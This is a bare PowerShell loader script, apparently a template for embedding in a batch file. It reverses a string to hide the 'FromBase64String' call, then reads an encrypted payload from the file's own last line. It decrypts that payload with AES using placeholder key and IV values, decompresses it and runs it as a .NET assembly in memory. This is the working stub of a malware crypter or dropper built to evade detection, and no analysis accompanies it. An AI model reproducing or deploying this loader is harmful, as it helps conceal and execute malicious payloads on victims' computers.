$tbsreversed_var = 'gnirtS46esaBmorF'.ToCharArray();
[array]::Reverse($tbsreversed_var);
$tbs_var = [String]::new($tbsreversed_var);
$contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine);
$lastline_var = $contents_var[$contents_var.Length - 1];
$payload_var = [System.Convert]::$tbs_var($lastline_var);
$aes_var = New-Object System.Security.Cryptography.AesManaged;
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key = [System.Convert]::$tbs_var('DECRYPTION_KEY');
$aes_var.IV = [System.Convert]::$tbs_var('DECRYPTION_IV');
$decryptor_var = $aes_var.CreateDecryptor();
$payload_var = $decryptor_var.TransformFinalBlock($payload_var, 0, $payload_var.Length);
$decryptor_var.Dispose();
$aes_var.Dispose();
$msi_var = New-Object System.IO.MemoryStream(, $payload_var);
$mso_var = New-Object System.IO.MemoryStream;
$gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress);
$gs_var.CopyTo($mso_var);
$gs_var.Dispose();
$msi_var.Dispose();
$mso_var.Dispose();
$payload_var = $mso_var.ToArray();
[System.Reflection.Assembly]::Load($payload_var).EntryPoint.Invoke($null, (, [string[]] ('%*')))